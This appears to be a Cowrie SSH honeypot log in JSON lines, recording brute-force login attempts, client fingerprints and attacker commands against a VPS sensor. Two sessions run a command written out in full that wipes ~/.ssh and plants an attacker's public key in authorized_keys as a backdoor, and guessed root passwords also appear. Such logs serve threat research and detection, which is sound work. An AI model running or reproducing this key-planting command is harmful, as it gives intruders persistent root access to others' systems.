{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T21:18:24.668760Z","src_ip":"45.88.8.215","session":"4fffb71a581f"}
{"eventid":"cowrie.login.success","username":"root","password":"Badri@123","message":"login attempt [root/Badri@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:18:27.047537Z","src_ip":"45.88.8.215","session":"4fffb71a581f"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:18:27.479310Z","src_ip":"45.88.8.215","session":"4fffb71a581f"}
{"eventid":"cowrie.session.connect","src_ip":"202.165.24.240","src_port":46074,"dst_ip":"1.2.3.4","dst_port":22,"session":"69ef41f91ce2","protocol":"ssh","message":"New connection: 202.165.24.240:46074 (1.2.3.4:22) [session: 69ef41f91ce2]","sensor":"my-vps","timestamp":"2025-08-24T21:18:59.425948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T21:18:59.426892Z","src_ip":"202.165.24.240","session":"69ef41f91ce2"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-24T21:18:59.596810Z","src_ip":"202.165.24.240","session":"69ef41f91ce2"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":45498,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5903dbc9917","protocol":"ssh","message":"New connection: 129.226.183.73:45498 (1.2.3.4:22) [session: f5903dbc9917]","sensor":"my-vps","timestamp":"2025-08-24T21:19:01.402071Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:19:01.411806Z","src_ip":"129.226.183.73","session":"f5903dbc9917"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:19:01.667113Z","src_ip":"129.226.183.73","session":"f5903dbc9917"}
{"eventid":"cowrie.login.success","username":"root","password":"Skemasuprem@890","message":"login attempt [root/Skemasuprem@890] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:19:02.693789Z","src_ip":"129.226.183.73","session":"f5903dbc9917"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:19:03.275875Z","src_ip":"129.226.183.73","session":"f5903dbc9917"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:19:03.276556Z","src_ip":"129.226.183.73","session":"f5903dbc9917"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:19:03.277267Z","src_ip":"129.226.183.73","session":"f5903dbc9917"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:19:03.535577Z","src_ip":"129.226.183.73","session":"f5903dbc9917"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:19:04.071297Z","src_ip":"129.226.183.73","session":"f5903dbc9917"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:19:04.071989Z","src_ip":"129.226.183.73","session":"f5903dbc9917"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:19:04.331314Z","src_ip":"129.226.183.73","session":"f5903dbc9917"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:19:04.332263Z","src_ip":"129.226.183.73","session":"f5903dbc9917"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":46694,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc1eae5845ec","protocol":"ssh","message":"New connection: 129.226.183.73:46694 (1.2.3.4:22) [session: dc1eae5845ec]","sensor":"my-vps","timestamp":"2025-08-24T21:19:04.605312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:19:04.606798Z","src_ip":"129.226.183.73","session":"dc1eae5845ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:19:04.883682Z","src_ip":"129.226.183.73","session":"dc1eae5845ec"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:19:06.021245Z","src_ip":"129.226.183.73","session":"dc1eae5845ec"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:19:07.297709Z","src_ip":"129.226.183.73","session":"dc1eae5845ec"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:19:07.426359Z","src_ip":"202.165.24.240","session":"69ef41f91ce2"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":47998,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2ae2750c13a","protocol":"ssh","message":"New connection: 129.226.183.73:47998 (1.2.3.4:22) [session: a2ae2750c13a]","sensor":"my-vps","timestamp":"2025-08-24T21:19:07.570616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:19:07.574084Z","src_ip":"129.226.183.73","session":"a2ae2750c13a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:19:07.848810Z","src_ip":"129.226.183.73","session":"a2ae2750c13a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:19:08.939333Z","src_ip":"129.226.183.73","session":"a2ae2750c13a"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:19:09.210378Z","src_ip":"129.226.183.73","session":"f5903dbc9917"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:19:09.218079Z","src_ip":"129.226.183.73","session":"a2ae2750c13a"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":42680,"dst_ip":"1.2.3.4","dst_port":22,"session":"a408b1342f88","protocol":"ssh","message":"New connection: 129.226.183.73:42680 (1.2.3.4:22) [session: a408b1342f88]","sensor":"my-vps","timestamp":"2025-08-24T21:20:09.262292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:20:09.263148Z","src_ip":"129.226.183.73","session":"a408b1342f88"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:20:09.545936Z","src_ip":"129.226.183.73","session":"a408b1342f88"}
{"eventid":"cowrie.login.failed","username":"s","password":"s","message":"login attempt [s/s] failed","sensor":"my-vps","timestamp":"2025-08-24T21:20:10.693348Z","src_ip":"129.226.183.73","session":"a408b1342f88"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:20:11.975529Z","src_ip":"129.226.183.73","session":"a408b1342f88"}
{"eventid":"cowrie.session.connect","src_ip":"180.184.65.100","src_port":17026,"dst_ip":"1.2.3.4","dst_port":22,"session":"65971cdbba65","protocol":"ssh","message":"New connection: 180.184.65.100:17026 (1.2.3.4:22) [session: 65971cdbba65]","sensor":"my-vps","timestamp":"2025-08-24T21:20:28.873624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:20:28.875274Z","src_ip":"180.184.65.100","session":"65971cdbba65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:20:29.089853Z","src_ip":"180.184.65.100","session":"65971cdbba65"}
{"eventid":"cowrie.login.success","username":"root","password":"123!@#aA","message":"login attempt [root/123!@#aA] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:20:29.988878Z","src_ip":"180.184.65.100","session":"65971cdbba65"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:20:30.489882Z","src_ip":"180.184.65.100","session":"65971cdbba65"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:20:30.490840Z","src_ip":"180.184.65.100","session":"65971cdbba65"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:20:30.492315Z","src_ip":"180.184.65.100","session":"65971cdbba65"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:20:30.708440Z","src_ip":"180.184.65.100","session":"65971cdbba65"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:20:31.153362Z","src_ip":"180.184.65.100","session":"65971cdbba65"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:20:31.154072Z","src_ip":"180.184.65.100","session":"65971cdbba65"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:20:31.370703Z","src_ip":"180.184.65.100","session":"65971cdbba65"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:20:31.371593Z","src_ip":"180.184.65.100","session":"65971cdbba65"}
{"eventid":"cowrie.session.connect","src_ip":"180.184.65.100","src_port":17032,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b3ec53898e3","protocol":"ssh","message":"New connection: 180.184.65.100:17032 (1.2.3.4:22) [session: 0b3ec53898e3]","sensor":"my-vps","timestamp":"2025-08-24T21:20:31.569469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:20:31.570116Z","src_ip":"180.184.65.100","session":"0b3ec53898e3"}
